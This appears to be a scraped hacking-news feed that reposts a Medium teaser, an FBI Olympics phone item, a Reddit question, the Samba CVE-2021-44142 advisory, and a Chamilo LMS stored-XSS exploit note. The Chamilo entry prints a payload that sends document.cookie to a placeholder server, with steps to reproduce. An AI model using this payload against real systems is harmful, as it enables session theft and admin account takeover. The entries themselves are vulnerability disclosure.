Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
My Journey to Cybersecurity
https://cdn-images-1.medium.com/max/1920/1*RRHmxJB8aqVm-dqsXVbLUA.jpeg
Why am I writing this?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
My Journey to Cybersecurity
https://cdn-images-1.medium.com/max/1920/1*RRHmxJB8aqVm-dqsXVbLUA.jpeg
Why am I writing this?
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
My Journey to Cybersecurity
Why am I writing this?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Olympic Athletes Advised by FBI to Bring 'Burner' Phones to Beijing
No specific threats against the Olympics, according to the FBI, but instead it's about vigilance against potential ones.
___________________________
@hacking_Attack
@Hacking_Video
Olympic Athletes Advised by FBI to Bring 'Burner' Phones to Beijing
No specific threats against the Olympics, according to the FBI, but instead it's about vigilance against potential ones.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Olympic Athletes Advised by FBI to Bring 'Burner' Phones to Beijing
No specific threats against the Olympics, according to the FBI, but instead it's about vigilance against potential ones.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Can a hacker use your own IP adress to hack from?
Police contacted me telling me, someone hacked an instagram account from my IP adress and that I'm a suspect. Me being the only one that uses the wifi, wonder how did that happen??
submitted by /u/Ognjen159
[link] [comments]
Can a hacker use your own IP adress to hack from?
Police contacted me telling me, someone hacked an instagram account from my IP adress and that I'm a suspect. Me being the only one that uses the wifi, wonder how did that happen??
submitted by /u/Ognjen159
[link] [comments]
reddit
Can a hacker use your own IP adress to hack from?
Police contacted me telling me, someone hacked an instagram account from my IP adress and that I'm a suspect. Me being the only one that uses the...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Samba VFS Heap Out-Of-Bounds Read / Write
https://4.bp.blogspot.com/-IV-83q7tlNU/WWlvNru3JHI/AAAAAAAAIMg/qWmIdM50sJs0a5mqLHfeVDVNkTKQ10wJwCLcBGAs/s1600/h23.png
All versions of Samba prior to 4.13.17 are vulnerable to an out-of-bounds heap read write vulnerability that allows remote attackers to execute arbitrary code as root on affected Samba installations that use the VFS module vfs_fruit.
MD5 |
Download
Source:packetstormsecurity.com
Samba VFS Heap Out-Of-Bounds Read / Write
https://4.bp.blogspot.com/-IV-83q7tlNU/WWlvNru3JHI/AAAAAAAAIMg/qWmIdM50sJs0a5mqLHfeVDVNkTKQ10wJwCLcBGAs/s1600/h23.png
All versions of Samba prior to 4.13.17 are vulnerable to an out-of-bounds heap read write vulnerability that allows remote attackers to execute arbitrary code as root on affected Samba installations that use the VFS module vfs_fruit.
MD5 |
06fcbc7e0777b32c642d00aaeef26159Download
=================================================================
== Subject: Out-of-bounds heap read/write vulnerability
== in VFS module vfs_fruit allows code execution
==
== CVE ID#: CVE-2021-44142
==
== Versions: All versions of Samba prior to 4.13.17
==
== Summary: This vulnerability allows remote attackers to
== execute arbitrary code as root on affected Samba
== installations that use the VFS module vfs_fruit.
=================================================================
===========
Description
===========
All versions of Samba prior to 4.13.17 are vulnerable to an
out-of-bounds heap read write vulnerability that allows remote
attackers to execute arbitrary code as root on affected Samba
installations that use the VFS module vfs_fruit.
The specific flaw exists within the parsing of EA metadata when
opening files in smbd. Access as a user that has write access to a
file's extended attributes is required to exploit this
vulnerability. Note that this could be a guest or unauthenticated user
if such users are allowed write access to file extended attributes.
The problem in vfs_fruit exists in the default configuration of the
fruit VFS module using fruit:metadata=netatalk or fruit:resource=file.
If both options are set to different settings than the default values,
the system is not affected by the security issue.
==================
Patch Availability
==================
Patches addressing both these issues have been posted to:
https://www.samba.org/samba/security/
Additionally, Samba 4.13.17, 4.14.12 and 4.15.5 have been issued as
security releases to correct the defect. Samba administrators are
advised to upgrade to these releases or apply the patch as soon
as possible.
==================
CVSSv3 calculation
==================
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C
Base score 9.9.
==========
Workaround
==========
As a workaround remove the "fruit" VFS module from the list of
configured VFS objects in any "vfs objects" line in the Samba
configuration smb.conf.
Note that changing the VFS module settings fruit:metadata or
fruit:resource to use the unaffected setting causes all stored
information to be inaccessible and will make it appear to macOS
clients as if the information is lost.
=======
Credits
=======
Originally reported by Orange Tsai from DEVCORE.
Patches provided by Ralph Böhme of the Samba team.
==========================================================
== Our Code, Our Bugs, Our Responsibility.
== The Samba Team
==========================================================
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Chamilo LMS 1.11.14 Cross Site Scripting / Account Takeover
https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
Chamilo LMS version 1.11.14 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Chamilo LMS 1.11.14 Cross Site Scripting / Account Takeover
https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
Chamilo LMS version 1.11.14 suffers from a persistent cross site scripting vulnerability.
MD5 |
2aec0cc4998138800d8ac868f08ddcb0Download
# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover
# Date: July 21 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://chamilo.org
# Software Link: https://chamilo.org
# Version: Chamilo-lms-1.11.x
# Tested on: Chamilo-lms-1.11.x
# CVE: CVE-2021-37391
#Publication:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Description: A user without privileges in Chamilo LMS 1.11.x can send an
invitation message to another user, e.g., the administrator, through
main/social/search.php,
main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on
the administration side via a stored XSS vulnerability via social network
the send invitation feature. .
CVE ID: CVE-2021-37391
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
URL:
https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities
Affected parameter: send private message - text field
Payload: x
http://yourserver/?c='+document.cookie>
Steps to reproduce:
1. Navigate to the social network menu
2. Select the victim profile
3. Add the payload on the text field
4. Submit the request and wait for the payload execution
*Impact:* By using this vulnerability, an unprivileged user can steal
cookies from an admin account or force the administrator to create an
account with admin privileges with an HTTP 302 redirect.
*Mitigation*: Update the Chamilo to the latest version.
*Fix*:
https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8
Com os meus melhores cumprimentos,
--
*Pedro Tavares*
Founder and Editor-in-Chief at seguranca-informatica.pt
Co-founder of CSIRT.UBI
Creator of 0xSI_f33d <https:
seguranca-informatica.pt | @sirpedrotavares
<https:| 0xSI_f33d
<https:
Source:packetstormsecurity.com